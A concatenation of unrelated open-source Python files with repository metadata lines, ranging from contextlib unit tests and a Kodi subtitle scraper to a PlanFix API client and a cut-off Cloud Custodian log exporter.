def testWithBoundedSemaphore(self):
lock = threading.BoundedSemaphore()
def locked():
if lock.acquire(False):
lock.release()
return False
else:
return True
self.boilerPlate(lock, locked)
class mycontext(ContextDecorator):
started = False
exc = None
catch = False
def __enter__(self):
self.started = True
return self
def __exit__(self, *exc):
self.exc = exc
return self.catch
class TestContextDecorator(unittest.TestCase):
def test_contextdecorator(self):
context = mycontext()
with context as result:
self.assertIs(result, context)
self.assertTrue(context.started)
self.assertEqual(context.exc, (None, None, None))
def test_contextdecorator_with_exception(self):
context = mycontext()
with self.assertRaisesRegex(NameError, 'foo'):
with context:
raise NameError('foo')
self.assertIsNotNone(context.exc)
self.assertIs(context.exc[0], NameError)
context = mycontext()
context.catch = True
with context:
raise NameError('foo')
self.assertIsNotNone(context.exc)
self.assertIs(context.exc[0], NameError)
def test_decorator(self):
context = mycontext()
@context
def test():
self.assertIsNone(context.exc)
self.assertTrue(context.started)
test()
self.assertEqual(context.exc, (None, None, None))
def test_decorator_with_exception(self):
context = mycontext()
@context
def test():
self.assertIsNone(context.exc)
self.assertTrue(context.started)
raise NameError('foo')
with self.assertRaisesRegex(NameError, 'foo'):
test()
self.assertIsNotNone(context.exc)
self.assertIs(context.exc[0], NameError)
def test_decorating_method(self):
context = mycontext()
class Test(object):
@context
def method(self, a, b, c=None):
self.a = a
self.b = b
self.c = c
# these tests are for argument passing when used as a decorator
test = Test()
test.method(1, 2)
self.assertEqual(test.a, 1)
self.assertEqual(test.b, 2)
self.assertEqual(test.c, None)
test = Test()
test.method('a', 'b', 'c')
self.assertEqual(test.a, 'a')
self.assertEqual(test.b, 'b')
self.assertEqual(test.c, 'c')
test = Test()
test.method(a=1, b=2)
self.assertEqual(test.a, 1)
self.assertEqual(test.b, 2)
def test_typo_enter(self):
class mycontext(ContextDecorator):
def __unter__(self):
pass
def __exit__(self, *exc):
pass
with self.assertRaises(AttributeError):
with mycontext():
pass
def test_typo_exit(self):
class mycontext(ContextDecorator):
def __enter__(self):
pass
def __uxit__(self, *exc):
pass
with self.assertRaises(AttributeError):
with mycontext():
pass
def test_contextdecorator_as_mixin(self):
class somecontext(object):
started = False
exc = None
def __enter__(self):
self.started = True
return self
def __exit__(self, *exc):
self.exc = exc
class mycontext(somecontext, ContextDecorator):
pass
context = mycontext()
@context
def test():
self.assertIsNone(context.exc)
self.assertTrue(context.started)
test()
self.assertEqual(context.exc, (None, None, None))
def test_contextmanager_as_decorator(self):
state = []
@contextmanager
def woohoo(y):
state.append(y)
yield
state.append(999)
@woohoo(1)
def test(x):
self.assertEqual(state, [1])
state.append(x)
test('something')
self.assertEqual(state, [1, 'something', 999])
# This is needed to make the test actually run under regrtest.py!
def test_main():
support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
|
MalloyPower/parsing-python
|
front-end/testsuite-python-lib/Python-3.2/Lib/test/test_contextlib.py
|
Python
|
mit
| 10,109 | 0.002968 |
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from django.core.management.base import BaseCommand
from desktop.lib.connectors.models import _get_installed_connectors
from beeswax.management.commands.beeswax_install_examples import Command as EditorCommand
from useradmin.models import User
LOG = logging.getLogger(__name__)
class Command(BaseCommand):
args = '<user>'
help = 'Install examples but do not overwrite them.'
def add_arguments(self, parser):
parser.add_argument(
'--username',
dest='username',
default='hue',
help='Hue username used to execute the command',
)
parser.add_argument(
'--dialect',
dest='dialect',
default=None,
help='Dialect name we want to install the samples, all if not specified',
)
def handle(self, *args, **options):
LOG.info('Installing %s examples as %s' % (options.get('dialect') or 'all', options['username']))
user = User.objects.get(username=options['username'])
dialect = options.get('dialect')
dialects = [
{
'id': connector['id'],
'dialect': connector['dialect']
}
for connector in _get_installed_connectors(category='editor')
if dialect is None or connector['dialect'] == dialect
]
tables = None
for dialect in dialects:
EditorCommand().handle(
app_name=dialect['dialect'], # Unused?
user=user,
tables=tables,
dialect=dialect['dialect'],
interpreter={'type': dialect['id']}
)
|
cloudera/hue
|
desktop/libs/notebook/src/notebook/management/commands/samples_setup.py
|
Python
|
apache-2.0
| 2,309 | 0.003465 |
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import time
import urllib2
import re
import HTMLParser
import socket
import xbmcvfs
import log_utils
import kodi
from constants import VIDEO_TYPES
from constants import SRT_SOURCE
from constants import USER_AGENT
from db_utils import DB_Connection
MAX_RETRIES = 2
TEMP_ERRORS = [500, 502, 503, 504]
BASE_URL = 'http://www.addic7ed.com'
class SRT_Scraper():
def __init__(self):
self.db_connection = DB_Connection()
def get_tvshow_id(self, title, year=None):
match_title = title.lower()
rows = self.db_connection.get_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE)
if rows:
tvshow_id = rows[0][0]
log_utils.log('Returning local tvshow id: |%s|%s|%s|' % (title, year, tvshow_id), log_utils.LOGDEBUG)
return tvshow_id
html = self.__get_cached_url(BASE_URL, 24)
regex = re.compile('option\s+value="(\d+)"\s*>(.*?)</option')
site_matches = []
for item in regex.finditer(html):
tvshow_id, site_title = item.groups()
# strip year off title and assign it to year if it exists
r = re.search('(\s*\((\d{4})\))$', site_title)
if r:
site_title = site_title.replace(r.group(1), '')
site_year = r.group(2)
else:
site_year = None
# print 'show: |%s|%s|%s|' % (tvshow_id, site_title, site_year)
if match_title == site_title.lower():
if year is None or year == site_year:
self.db_connection.set_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE, tvshow_id)
return tvshow_id
site_matches.append((tvshow_id, site_title, site_year))
if not site_matches:
return None
elif len(site_matches) == 1:
self.db_connection.set_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE, site_matches[0][0])
return site_matches[0][0]
else:
# there were multiple title matches and year was passed but no exact year matches found
for match in site_matches:
# return the match that has no year specified
if match[2] is None:
self.db_connection.set_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE, match[0])
return match[0]
def get_season_subtitles(self, language, tvshow_id, season):
url = BASE_URL + '/ajax_loadShow.php?show=%s&season=%s&langs=&hd=%s&hi=%s' % (tvshow_id, season, 0, 0)
html = self.__get_cached_url(url, .25)
# print html.decode('ascii', 'ignore')
req_hi = kodi.get_setting('subtitle-hi') == 'true'
req_hd = kodi.get_setting('subtitle-hd') == 'true'
items = []
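        # Each regex match below is one row of the season table:
        # (season, episode, language, version, completed, hearing-impaired
        #  flag, corrected flag, HD flag, download URL)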
regex = re.compile('<td>(\d+)</td><td>(\d+)</td><td>.*?</td><td>(.*?)</td><td.*?>(.*?)</td>.*?<td.*?>(.+?)</td><td.*?>(.*?)</td><td.*?>(.*?)</td><td.*?>(.*?)</td><td.*?><a\s+href="(.*?)">.+?</td>',
re.DOTALL)
for match in regex.finditer(html):
season, episode, srt_lang, version, completed, hi, corrected, hd, srt_url = match.groups()
if not language or language == srt_lang and (not req_hi or hi) and (not req_hd or hd):
item = {}
item['season'] = season
item['episode'] = episode
item['language'] = srt_lang
item['version'] = version
if completed.lower() == 'completed':
item['completed'] = True
item['percent'] = '100'
else:
item['completed'] = False
r = re.search('([\d.]+)%', completed)
if r:
item['percent'] = r.group(1)
else:
item['percent'] = '0'
item['hi'] = True if hi else False
item['corrected'] = True if corrected else False
item['hd'] = True if hd else False
item['url'] = srt_url
items.append(item)
return items
def get_episode_subtitles(self, language, tvshow_id, season, episode):
subtitles = self.get_season_subtitles(language, tvshow_id, season)
items = []
for subtitle in subtitles:
if subtitle['episode'] == str(episode):
items.append(subtitle)
return items
def download_subtitle(self, url):
url = BASE_URL + url
(response, srt) = self.__get_url(url)
if not hasattr(response, 'info') or 'Content-Disposition' not in response.info():
return
cd = response.info()['Content-Disposition']
r = re.search('filename="(.*)"', cd)
if r:
filename = r.group(1)
else:
filename = 'addic7ed_subtitle.srt'
filename = re.sub('[^\x00-\x7F]', '', filename)
final_path = os.path.join(kodi.get_setting('subtitle-folder'), filename)
final_path = kodi.translate_path(final_path)
if not xbmcvfs.exists(os.path.dirname(final_path)):
try:
try: xbmcvfs.mkdirs(os.path.dirname(final_path))
except: os.mkdir(os.path.dirname(final_path))
except:
log_utils.log('Failed to create directory %s' % os.path.dirname(final_path), log_utils.LOGERROR)
raise
with open(final_path, 'w') as f:
f.write(srt)
return final_path
def __get_url(self, url):
try:
req = urllib2.Request(url)
host = BASE_URL.replace('http://', '')
req.add_header('User-Agent', USER_AGENT)
req.add_header('Host', host)
req.add_header('Referer', BASE_URL)
response = urllib2.urlopen(req, timeout=10)
body = response.read()
parser = HTMLParser.HTMLParser()
body = parser.unescape(body)
except Exception as e:
kodi.notify(msg='Failed to connect to URL: %s' % (url), duration=5000)
log_utils.log('Failed to connect to URL %s: (%s)' % (url, e), log_utils.LOGERROR)
return ('', '')
return (response, body)
def __get_cached_url(self, url, cache=8):
log_utils.log('Fetching Cached URL: %s' % url, log_utils.LOGDEBUG)
before = time.time()
_created, _res_header, html = self.db_connection.get_cached_url(url, cache_limit=cache)
if html:
log_utils.log('Returning cached result for: %s' % (url), log_utils.LOGDEBUG)
return html
log_utils.log('No cached url found for: %s' % url, log_utils.LOGDEBUG)
req = urllib2.Request(url)
host = BASE_URL.replace('http://', '')
req.add_header('User-Agent', USER_AGENT)
req.add_header('Host', host)
req.add_header('Referer', BASE_URL)
try:
body = self.__http_get_with_retry(url, req)
body = body.decode('utf-8')
parser = HTMLParser.HTMLParser()
body = parser.unescape(body)
except Exception as e:
kodi.notify(msg='Failed to connect to URL: %s' % (url), duration=5000)
log_utils.log('Failed to connect to URL %s: (%s)' % (url, e), log_utils.LOGERROR)
return ''
self.db_connection.cache_url(url, body)
after = time.time()
log_utils.log('Cached Url Fetch took: %.2f secs' % (after - before), log_utils.LOGDEBUG)
return body
def __http_get_with_retry(self, url, request):
log_utils.log('Fetching URL: %s' % request.get_full_url(), log_utils.LOGDEBUG)
        retries = 0
        response = None
        html = None
while retries <= MAX_RETRIES:
try:
response = urllib2.urlopen(request, timeout=10)
html = response.read()
# if no exception, jump out of the loop
break
except socket.timeout:
retries += 1
log_utils.log('Retry #%s for URL %s because of timeout' % (retries, url), log_utils.LOGWARNING)
continue
except urllib2.HTTPError as e:
# if it's a temporary code, retry
if e.code in TEMP_ERRORS:
retries += 1
log_utils.log('Retry #%s for URL %s because of HTTP Error %s' % (retries, url, e.code), log_utils.LOGWARNING)
continue
# if it's not pass it back up the stack
else:
raise
else:
raise
        if response is not None:
            response.close()
return html
|
AMOboxTV/AMOBox.LegoBuild
|
plugin.video.salts/salts_lib/srt_scraper.py
|
Python
|
gpl-2.0
| 9,410 | 0.004145 |
#This script is built as a prototype during Mozilla HelloWeb Hackathon Kolkata 2016
#An Interactive Artificial Intelligence with a friendly personality to teach 5 year olds about HTML and WEB
#Copyright Protected Under GPL3 License | Follow the License | Send Pull Requests
import re
import py
import requests
import pyaudio
import speech_recognition as sr
import os
import random
import socket
import webbrowser # facebook.com/ultimatepritam | github.com/ultimatepritam
import subprocess
import glob  # GRAPHICAL USER INTERFACE using 'Tkinter' imitating "DORA THE EXPLORER"
import time
##CONFIGURE THIS SECTION TO INDIAN LANGUAGES
# set property to voice engine
import pyttsx
engine = pyttsx.init('sapi5') #USE espeak IN LINUX
engine.setProperty('voice', 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Speech\Voices\Tokens\TTS_MS_EN-US_ZIRA_11.0')
engine.setProperty('rate', 130)
# speak function
def speak(text):
engine.say(text)
engine.runAndWait()
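# e.g. speak("Hello there") -- runAndWait() blocks until the phrase has been
# spoken in full before the script continues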
doss = os.getcwd()
i=0
n=0
flag=0
FACE = '''
+=======================================+
|.....JARVIS ARTIFICIAL INTELLIGENCE...|
+---------------------------------------+
|#Author: ALienTrix |
|#Date: 01/06/2016 |
___
( )
.-.| | .--. ___ .-. .---.
/ \ | / \ ( ) \ / .-, \
| .-. | | .-. ; | ' .-. ; (__) ; |
| | | | | | | | | / (___) .'` |
| | | | | | | | | | / .'| |
| | | | | | | | | | | / | |
| ' | | | ' | | | | ; | ; |
' `-' / ' `-' / | | ' `-' |
`.__,' `.__.' (___) `.__.'_.
| |
+---------------------------------------+
|.....JARVIS ARTIFICIAL INTELLIGENCE...|
+=======================================+
| |
+=======================================+
'''
print(FACE)
while (i<1):
r = sr.Recognizer()
with sr.Microphone() as source:
        r.adjust_for_ambient_noise(source)  # calibrates the recognizer; returns None
speak("Listening..")
print("|-('')-|") #START TALKING ONLY AFTER THIS PRINTS ON THE SCREEN
audio = r.listen(source)
try:
            s = (r.recognize_google(audio))  # Google's recognizer is used as it's the best online option; CMU Sphinx works offline
message = (s.lower())
print (message)
# PROFESSOR JARVIS ========================================================================================================== TRAINING MODULE
if("teach me web") in message:
rand = ['Oh My Goodness! You are only 5 years old! and you wanna know HTML?']
speak(rand)
speak("Okay, So HTML Stands for Hyper Text Markup Language! But lets not worry about this big word")
speak("Now I'll do something for you, but lets first you cute little thing tell me whats your name ?")
r = sr.Recognizer()
with sr.Microphone() as source:
                r.adjust_for_ambient_noise(source)  # calibrates the recognizer; returns None
#speak("Listening..")
print(">>>")
audio = r.listen(source)
s = (r.recognize_google(audio))
message = (s.lower())
name=message
print (name)
speak('Oukay'+message+', So pretty name you have!')
speak("Now Lets check this Cool thing I'm opening here...")
Chrome = ("C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s")
webbrowser.get(Chrome).open('KeepCalm.html') #You might need to put the full path of the file here
# B102 HARDWARE INTERRUPT NEEDED, CLOSE CHROME MANUALLY
#time.sleep(10)
#os.system('taskkill /im chrome.exe /f')
speak("Do you see your name there? What? No?")
print("10 sec up")
os.system('atom KeepCalm.html')
#subprocess.call(['notepad.exe','KeepCalm.html'])
# To be done: Selenium Time Controlled Web Browser Monitor
speak("Okay I am Opening something where you'll see some bla bla texts..")
speak("You see it?")
time.sleep(10)
print("10 sec up")
#HEADER
speak("Look theres written Dora the explorer there, lets change it your name. You know you have a good cool name. Lets write it down here.")
#os.system("notepad.exe keepcalm.html")
#os.system('atom KeepCalm.html')
time.sleep(10)
print("10 sec up")
speak("Now lets check the page with the Ugly naked guy again!")
webbrowser.get(Chrome).open('KeepCalm.html') #You might need to put the full path of the file here
speak("can you see your name there now?")
speak("You see it? Great!!")
speak("You know its called a Header in html, grown ups write some big texts here!")
#IMAGE IMPORT IN HTML
speak("Oho! Everything is great but you don't have to be naked for that. Lets dress up, shall we?")
speak("Now lets again check that stupid file with lots of bla bla texts in it")
os.system('atom KeepCalm.html')
speak("Do you see NAKED Guy written on somewhere? Can you see it? You found it? Yaaai!!")
speak("Now lets change it to DRESSED Guy")
speak("Now lets check the browser again")
webbrowser.get(Chrome).open('KeepCalm.html') #You might need to put the full path of the file here
speak("Yep! this looks better! You are a Smart kid!")
speak("Now what you just did is how we change pictures in HTML")
#STYLING IN HTML
speak("Well since we are actually doing many cool stuffs! so that 'Keep calm and Do Nothing' phrase is little awkward. don't you think so?")
speak("Now lets change it like you changed your name, Come on you can do it, I'm opening the same thing for you, its called an Editor, here you can write html codes")
os.system('atom KeepCalm.html')
speak("Now lets change the text to Keep calm and do Coding")
time.sleep(10)
print("10 sec up")
speak("you did it, cool")
speak("This portion of the code is called the Body you know! Body of the code!")
speak("Now lets make the fonts look little bit bigger")
speak("can you see there written font size?")
speak("Change the value next to the font size 160 to 200 now")
webbrowser.get(Chrome).open('KeepCalm.html')
speak("You done it? Good Work!")
speak("This thing just you did is called Styling. You know every cool kid likes fashion, our html too is cool. he likes styles. and it is called CSS")
#FURTHER DEVELOPMENT GOES BELOW HERE INSIDE THE LOOP
# exceptions
except sr.UnknownValueError:
print("$could not understand audio")
speak("Pardon sir, can you please repeat?")
except sr.RequestError as e:
print("Could not request results$; {0}".format(e))
|
ultimatepritam/HelloWeb
|
DoraTheExplorer.py
|
Python
|
gpl-3.0
| 7,919 | 0.011491 |
# -*- coding: utf-8 -*-
# Copyright 2017 KMEE
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from __future__ import division, print_function, unicode_literals
TIPO_COBRANCA = (
('0', u'Carteira'),
('1', u'Cheque'),
('2', u'CNAB'),
)
TIPO_COBRANCA_SPED = (
('0', u'Duplicata'),
('1', u'Cheque'),
('2', u'Promissória'),
('3', u'Recibo'),
)
|
odoo-brazil/l10n-brazil-wip
|
l10n_br_financial/constantes.py
|
Python
|
agpl-3.0
| 388 | 0 |
from yaml.composer import Composer
from yaml.nodes import MappingNode
class AnsibleComposer(Composer):
def __init__(self):
self.__mapping_starts = []
super(Composer, self).__init__()
def compose_node(self, parent, index):
# the line number where the previous token has ended (plus empty lines)
node = Composer.compose_node(self, parent, index)
if isinstance(node, MappingNode):
node.__datasource__ = self.name
try:
(cur_line, cur_column) = self.__mapping_starts.pop()
except:
cur_line = None
cur_column = None
node.__line__ = cur_line
node.__column__ = cur_column
return node
def compose_mapping_node(self, anchor):
# the column here will point at the position in the file immediately
# after the first key is found, which could be a space or a newline.
# We could back this up to find the beginning of the key, but this
# should be good enough to determine the error location.
self.__mapping_starts.append((self.line + 1, self.column + 1))
return Composer.compose_mapping_node(self, anchor)
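# Sketch of how this composer is typically wired in (hypothetical class name;
# the mixin order mirrors PyYAML's own Loader):
#
#   class AnsibleLoader(Reader, Scanner, Parser, AnsibleComposer,
#                       Constructor, Resolver):
#       ...
#
# so every composed MappingNode carries __line__/__column__/__datasource__
# for later error reporting.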
|
gitterHQ/ansible
|
v2/ansible/parsing/yaml/composer.py
|
Python
|
gpl-3.0
| 1,212 | 0.00495 |
import os
from subprocess import call, Popen, PIPE
import sys
from . import Command
from . import utils
class OpenSequenceInRV(Command):
"""%prog [options] [paths]
Open the latest version for each given entity.
"""
def run(self, sgfs, opts, args):
# Parse them all.
arg_to_movie = {}
arg_to_entity = {}
for arg in args:
if os.path.exists(arg):
arg_to_movie[arg] = arg
continue
print 'Parsing %r...' % arg
data = utils.parse_spec(sgfs, arg.split(), ['Shot'])
type_ = data.get('type')
id_ = data.get('id')
if not (type_ or id_):
print 'no entities found for', repr(arg)
return 1
arg_to_entity.setdefault(type_, {})[arg] = sgfs.session.merge(dict(type=type_, id=id_))
tasks = arg_to_entity.pop('Task', {})
shots = arg_to_entity.pop('Shot', {})
if arg_to_entity:
print 'found entities that were not Task or Shot:', ', '.join(sorted(arg_to_entity))
return 2
if tasks:
print 'Getting shots from tasks...'
sgfs.session.fetch(tasks.values(), 'entity')
for arg, task in tasks.iteritems():
shots[arg] = task['entity']
if shots:
print 'Getting versions from shots...'
sgfs.session.fetch(shots.values(), ('sg_latest_version.Version.sg_path_to_movie', 'sg_latest_version.Version.sg_path_to_frames'))
for arg, shot in shots.iteritems():
version = shot.get('sg_latest_version')
if not version:
print 'no version for', shot
return 3
path = version.get('sg_path_to_movie') or version.get('sg_path_to_frames')
if not path:
print 'no movie or frames for', version
return 4
arg_to_movie[arg] = path
movies = [arg_to_movie[arg] for arg in args]
print 'Opening:'
print '\t' + '\n\t'.join(movies)
rvlink = Popen(['rv', '-bakeURL'] + movies, stderr=PIPE).communicate()[1].strip().split()[-1]
self.open(rvlink)
def open(self, x):
if sys.platform.startswith('darwin'):
call(['open', x])
else:
call(['xdg-open', x])
run = OpenSequenceInRV()
|
westernx/sgfs
|
sgfs/commands/rv.py
|
Python
|
bsd-3-clause
| 2,458 | 0.004475 |
import requests
from hashlib import md5
from xml.etree import ElementTree
from django.core.cache import cache
from functools import cmp_to_key
# class Cache(object):
# params = {}
#
# def get(self,key):
# if key in self.params:
# return self.params[key]
# else:
# return None
#
# def set(self,key,value,timeout):
# self.params[key] = value
#
#
# cache = Cache()
class PlanFixBase(object):
CACHE_TIMELIFE = 20
request_templ = """<?xml version="1.0" encoding="UTF-8"?>
<request method="{}">
{}
<signature>{}</signature>
</request>
"""
name = ''
scheme = []
sign = ''
host = ""
api_key = ""
private_key = ""
project_id = ""
user = ""
password = ""
account = ""
level = 0
sid = None
debug = None
def __init__(self,*args,**kwargs):
self.sid = cache.get('planfix_sid')
attr_list = [i.__str__() for i in dir(self) if not i.startswith('__')]
if kwargs:
for item in kwargs.keys():
if item in attr_list:
self.__setattr__(item,kwargs[item])
if not self.sid:
self.auth()
def scheme_sort(self,a,b):
tmp_a = a.keys()[0] if isinstance(a,dict) else a
tmp_b = b.keys()[0] if isinstance(b,dict) else b
if tmp_a == tmp_b: return 0
if tmp_a > tmp_b:
return 1
else:
return -1
def get_sign(self,**kwargs):
params_list = self.name + self.string_by_schemefileds(self.scheme,**kwargs) + self.private_key
self.sign = md5(params_list.encode('utf-8')).hexdigest()
def string_by_schemefileds(self,element,**kwargs):
result_list = []
        element = sorted(element, key=cmp_to_key(self.scheme_sort))
        for item in element:
            if not isinstance(item, dict):
                result_list.append(self.get_value(item, **kwargs))
else:
tmp_key, tmp_val = item.items()[0]
if not isinstance(tmp_val, list):
if tmp_val == 'id':
result_list.append(self.get_value(tmp_key, **kwargs))
elif tmp_val == 'customValue':
res = self.get_value(tmp_key, **kwargs)
if not res == '' and isinstance(res, list):
result_list.append("".join(["".join([str(i[0]),str(i[1])]) for i in res]))
else:
result_list.append(self.get_value(tmp_val, **kwargs))
else:
result_list.append(self.string_by_schemefileds(tmp_val, **kwargs))
return "".join(result_list)
def get_value(self,value, **kwargs):
if value in kwargs:
return kwargs.get(value)
return ''
def create_xml_by_scheme(self,element, **kwargs):
result = ""
template = "<%s>%s</%s>"
custom_data_template = "<id>%s</id><value>%s</value>"
for item in element:
if not isinstance(item, dict):
result += template % (item, self.get_value(item, **kwargs), item)
else:
tmp_key, tmp_val = item.items()[0]
if not isinstance(tmp_val, list):
if tmp_val == 'id':
sub_result = template % (tmp_val, self.get_value(tmp_key, **kwargs), tmp_val)
elif tmp_val == 'customValue':
res = self.get_value(tmp_key, **kwargs)
if not res == '' and isinstance(res,list):
sub_result = "".join([template % (tmp_val,(custom_data_template % i),tmp_val) for i in res])
else:
sub_result = template % (tmp_val, self.get_value(tmp_key, **kwargs), tmp_val)
else:
sub_result = self.create_xml_by_scheme(tmp_val, **kwargs)
result += template % (tmp_key, sub_result, tmp_key)
return result
def connect(self,**kwargs):
if not 'sid' in kwargs and self.sid:
kwargs['sid'] = self.sid
self.get_sign(**kwargs)
body = self.create_xml_by_scheme(self.scheme, **kwargs)
self.print_debug(body)
data = self.request_templ.format(self.name,body.encode('utf-8'),self.sign)
r = requests.post(self.host, data=data, auth=(self.api_key, ""))
if self.name != 'auth.login':
if self.is_session_valid(r.content):
self.print_debug(r.content)
return r.content
else:
tmp_params = dict(name=self.name,scheme=self.scheme)
self.auth(renew=True)
self.scheme,self.name = tmp_params['scheme'],tmp_params['name']
return self.connect(**kwargs)
else:
return r.content
def is_session_valid(self,res):
response = ElementTree.fromstring(res)
if response.attrib['status'] == 'ok':
return True
else:
if response.find('code').text == '0005':
return False
else:
raise AttributeError(response.find('code').text)
def auth(self,renew=False):
if renew or self.sid == None:
self.name = 'auth.login'
self.scheme = \
[ 'account'
, 'login'
, 'password'
]
params = \
{ 'account':self.account
, 'login':self.user
, 'password':self.password
}
response = ElementTree.fromstring(self.connect(**params))
res = response.find('sid')
self.sid = res.text
cache.set('planfix_sid',self.sid,self.CACHE_TIMELIFE*60)
def print_debug(self,msg):
if hasattr(self.debug,'__call__'):
try:
self.debug(msg)
except TypeError as e:
print(e)
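# Minimal subclass sketch (assumed usage; ``task.get`` and the field names
# below are illustrative, not a documented PlanFix call): a concrete API
# method is described by ``name`` plus a ``scheme`` of fields, and
# ``connect(**kwargs)`` renders them into the signed XML request.
#
#     class TaskGet(PlanFixBase):
#         name = 'task.get'
#         scheme = ['sid', {'task': 'id'}]
#
#     api = TaskGet(host='https://api.planfix.ru/xml/', api_key='...',
#                   private_key='...', account='...', user='...',
#                   password='...')
#     raw_xml = api.connect(task='12345')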
|
chadoneba/django-planfix
|
planfix/classes.py
|
Python
|
apache-2.0
| 6,136 | 0.009452 |
class LoggerSingleton:
_instance = None
@staticmethod
def get_instance(console_log=False):
if LoggerSingleton._instance is None:
LoggerSingleton._instance = LoggerSingleton._Logger()
if console_log:
LoggerSingleton._instance.set_next(LoggerSingleton._ConsoleLogger())
return LoggerSingleton._instance
class _Logger(object):
def __init__(self):
self.next_logger = None
def log(self, message):
if self.next_logger is not None:
self.next_logger.log(message)
def set_next(self, next):
if self.next_logger is not None:
self.next_logger.set_next(next)
else:
self.next_logger = next
class _ConsoleLogger(_Logger):
def __init__(self):
LoggerSingleton._Logger.__init__(self)
def log(self, message):
print message
LoggerSingleton._Logger.log(self, message)
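# Usage sketch (assumed): callers always go through get_instance(), and
# passing console_log=True chains a console logger onto the singleton.
#
#     logger = LoggerSingleton.get_instance(console_log=True)
#     logger.log("piollo started")  # echoed to the console by _ConsoleLogger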
|
oknalv/piollo
|
loggersingleton.py
|
Python
|
gpl-2.0
| 1,004 | 0.001992 |
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import testtools
from stackalytics.processor import mps
class TestMps(testtools.TestCase):
def setUp(self):
super(TestMps, self).setUp()
def test_member_parse_regex(self):
content = '''<h1>Individual Member Profile</h1>
<div class="candidate span-14">
<div class="span-4">
<img src="/themes/openstack/images/generic-profile-photo.png"><p> </p>
</div>
<a name="profile-10501"></a>
<div class="details span-10 last">
<div class="last name-and-title">
<h3>Jim Battenberg</h3>
</div>
<hr><div class="span-3"><strong>Date Joined</strong></div>
<div class="span-7 last">June 25, 2013 <br><br></div>
<div class="span-3"><strong>Affiliations</strong></div>
<div class="span-7 last">
<div>
<b>Rackspace</b> From (Current)
</div>
</div>
<div class="span-3"><strong>Statement of Interest </strong></div>
<div class="span-7 last">
<p>contribute logic and evangelize openstack</p>
</div>
<p> </p>'''
match = re.search(mps.NAME_AND_DATE_PATTERN, content)
self.assertTrue(match)
self.assertEqual('Jim Battenberg', match.group('member_name'))
self.assertEqual('June 25, 2013 ', match.group('date_joined'))
match = re.search(mps.COMPANY_PATTERN, content)
self.assertTrue(match)
self.assertEqual('Rackspace', match.group('company_draft'))
|
ogazitt/stackalytics
|
tests/unit/test_mps.py
|
Python
|
apache-2.0
| 1,964 | 0 |
# Copyright 2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from botocore.exceptions import ClientError
import boto3
import click
import json
from c7n.credentials import assumed_session
from c7n.utils import get_retry, dumps, chunks
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime, timedelta
from dateutil.tz import tzutc, tzlocal
from dateutil.parser import parse
import fnmatch
import functools
import jsonschema
import logging
import time
import os
import operator
from tabulate import tabulate
import yaml
from c7n.executor import MainThreadExecutor
MainThreadExecutor.async = False
logging.basicConfig(level=logging.INFO)
logging.getLogger('c7n.worker').setLevel(logging.DEBUG)
logging.getLogger('botocore').setLevel(logging.WARNING)
log = logging.getLogger('c7n-log-exporter')
CONFIG_SCHEMA = {
'$schema': 'http://json-schema.org/schema#',
'id': 'http://schema.cloudcustodian.io/v0/logexporter.json',
'definitions': {
'destination': {
'type': 'object',
'additionalProperties': False,
'required': ['bucket'],
'properties': {
'bucket': {'type': 'string'},
'prefix': {'type': 'string'},
},
},
'account': {
'type': 'object',
'additionalProperties': False,
'required': ['role', 'groups'],
'properties': {
'name': {'type': 'string'},
'role': {'oneOf': [
{'type': 'array', 'items': {'type': 'string'}},
{'type': 'string'}]},
'groups': {
'type': 'array', 'items': {'type': 'string'}
}
}
}
},
'type': 'object',
'additionalProperties': False,
'required': ['accounts', 'destination'],
'properties': {
'accounts': {
'type': 'array',
'items': {'$ref': '#/definitions/account'}
},
'destination': {'$ref': '#/definitions/destination'}
}
}
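# A config file that validates against CONFIG_SCHEMA looks roughly like
# this (bucket name, role ARN and group patterns are made-up placeholders):
#
#     destination:
#       bucket: my-log-archive
#       prefix: cloudwatch
#     accounts:
#       - name: dev
#         role: arn:aws:iam::111122223333:role/log-exporter
#         groups:
#           - "/aws/lambda/*"
#           - "flow-log*"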
def debug(func):
@functools.wraps(func)
def run(*args, **kw):
try:
return func(*args, **kw)
except SystemExit:
raise
except Exception:
import traceback
import pdb
import sys
traceback.print_exc()
pdb.post_mortem(sys.exc_info()[-1])
raise
return run
@click.group()
def cli():
